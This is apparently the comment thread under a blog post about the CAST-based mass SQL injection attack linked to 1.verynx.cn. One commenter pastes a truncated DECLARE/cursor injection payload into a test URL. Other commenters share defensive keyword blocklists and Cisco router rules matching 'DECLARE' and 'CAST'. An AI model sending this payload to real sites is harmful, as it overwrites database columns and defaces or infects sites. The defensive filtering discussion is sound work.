Comments on: SQL Injection Hack using CAST from 1.verynx.cn

By: Alex

Alex — Thu, 17 Dec 2009 19:10:52 +0000

Hi!

I created a video tutorial about SQL injection.
Take a look:

http://www.webmastervideoschool.com/blog_item.php?id=7

By: Dave

Dave — Mon, 02 Nov 2009 16:16:26 +0000

Hi Sandy,

There are some scanners available that will scan the website and tell you if they’ve detected any type of weakness (injection, XSS, etc…). If you search around online you should be able to find some free ones and some others that require you to purchase a license. There’s one called Acunetix that allows you to do XSS scanning for free but you must buy a license to do the other scans. The other option you have is to hire someone who has experience with testing a solution and providing detailed reports on security concerns. Typically a scan of a website isn’t enough to ensure it’s secure. (As secure as it can be) A code review should be undertaken as well as security scans.

Hope that helps – good luck.

Thanks,
Dave

By: sandy

sandy — Thu, 29 Oct 2009 10:37:48 +0000

hi,

I am a QA person and after reading your post i applied to above code to some website created in PHP, i am testing these days (server is placed soemwhere else).

e.g., http://www.mywebsite.com/home.php?declare ;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update ['+@T+'] set ['+@C+']=['+@C+']+””>

so how would i know if the chnages have taken effect or some error has occured since I clicked enter and normal page opened against that URL of my website under test as if nothing had happened. Please tell me how to check if something wrong has occured or not or tell me of some tool that records and shows what’s happening at the back end

By: sandrar

sandrar — Thu, 10 Sep 2009 13:28:24 +0000

Hi! I was surfing and found your blog post… nice! I love your blog. Cheers! Sandra. R.

By: niccisweden

niccisweden — Tue, 18 Aug 2009 15:08:52 +0000

informative for me, like that

[url=http://www.injectable-filler.com]injectable filler

By: Zaphod

Zaphod — Mon, 01 Dec 2008 17:32:40 +0000

This very selfsame injection attack, that was the impetus for me writing a new breed of php and mysql website protecting script, to protect my own website assets.

I am now sharing the script with the world, licensed GNU/GPL V.2 and it does much more than just detect this attack. It also does IP range banning, hostname banning, keyword banning, and a few other cool tricks to protect your website. Give it an eyeball at http://zaphodb777.dyndns.org/zbblockpage.php , and discuss it at http://zaphodb777.dyndns.org/forum.

Thanks!

By: Adil Nawaz Khan

Adil Nawaz Khan — Thu, 27 Nov 2008 14:26:05 +0000

Hi All,
I just wanted to share my work around for this type of sql injection. I applied security at multiple places. First i created a method which takes value of querystring and checks for some malicious text like “Declare”,”Cast”,”Convert”,”Var”,”‘”,”,”",”Drop”,”Delete”,”Update”,”Insert”,”Create”,”Set”,”Database”. If this function finds any of these malicious codes, it will first get an IP# of the requesting machine and stroes it to the MaliciousIP table and rejects the request by just refreshing the page. Showing some kind of message may provide them some kind of hints which they can make use of.
The IP# which belongs to MaliciousIP would be allowed to enter same data only two more times, after that it will be blocked forever. Again not messages. This helps us to frustrate them a bit. And this is what our tsk is, to frustrate them and make them leave wrong attempt.
The third security step i took is using a “Check” constraint. I have some very important tables in my database, which i needed to make sure should not be affected at all. I attached “Check” constraint with the help of expression including keywords like “”,”/”,”.js”,”!”,”–”. These chck constraint can reject data coming in with these words.
Similar kind of security blocks you can follow according to your requirement. I would appreciate suggestions if any is available for this concern.
Hackers are among us, and we can defeat them, just keep your spirit up.

Thanks
Adil

By: Allen Harkleroad

Allen Harkleroad — Sat, 25 Oct 2008 10:44:25 +0000

We blocked SQL injections at our Cisco router (anything running Cisco IOS should block it). We built a class-map called http-hacks, set it to null route and put:

Match protocol http url “*;DECLARE*”
Match protocol http url “*DECLARE%20*”
Match protocol http url “*=CAST*”

We applied the class-map to the external facing interface (incoming). You could also apply it on the other interface as well to stop any outgoing attacks if you are worried about such things.

in it, drops all incoming http containing those. You can do similar for nearly any http request. We did the same thing with the Storm worm crud and a few other things we got tired of script kiddies trying to hit (like cmd.exe, default.ida, etc.)

By: aman

aman — Mon, 20 Oct 2008 06:18:32 +0000

hi,

this side Aman….my blog is hacked and i want to get it back….plz tell me any sloution if you have ..plz help me.

By: joet

joet — Tue, 14 Oct 2008 01:32:48 +0000

hackers are back and were able to overwrite a file despite permissions denying write